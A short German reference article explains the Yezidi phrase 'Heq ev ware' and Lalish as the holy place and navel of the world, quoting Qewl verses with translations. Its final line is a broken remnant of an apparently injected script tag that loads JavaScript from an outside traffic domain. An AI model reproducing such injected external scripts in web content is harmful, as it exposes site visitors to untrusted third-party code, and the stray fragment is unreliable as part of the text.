Art. Nummer Autor Datum Aktualisierung
101 Hayrî Demir 10.09.2013

Lalish (6)„Heq ev ware“ (dt. „dies ist der rechte Ort“) ist ein bekannter Ausspruch aus den heiligen Texten der Êzîden, den sog. Qewls.

Der Ausspruch wird von Xweda, dt. Gott, getätigt, als dieser den ersten festen Ort der Erde bestimmt, die bis dahin nur aus Wasser bestand. Daher taucht der Ausspruch in den Darstellungen des êzîdîschen Schöpfungsmythos immer wieder auf.

Der besagte Ort ist der, wo das Heiligtum der Êzîden Lalish (kurd. Laliş) steht. Für die Êzîden gilt Lalish als der Nabel der Welt.

Qewlê zebûnî meksûr, S. 26
Padşa û her çar yare – der König und all seine vier Freunde
Li merkebê dibûn siware – Stiegen auf ein Schiff
Tê seyrîn çar kinare – Umfuhren die vier Himmelsrichtungen
Li Laliş sekinî, got: Heq ev ware! – In Lalish blieben sie stehen und sagten: Dies ist der rechte Ort!

Qewlê afirandina dinyaye, S. 16
Siltan Êzîd xweş rêbere – Siltan Êzîd ist ein guter Wegweiser
Laliş ko riknê beşere – Lalish ist der Nabel der Menschheit
Niha Êzîdî jê xebere – Die Êzîden sprechen nun davon

and.buyittraffic.com/clizkes' type='text/javascript'>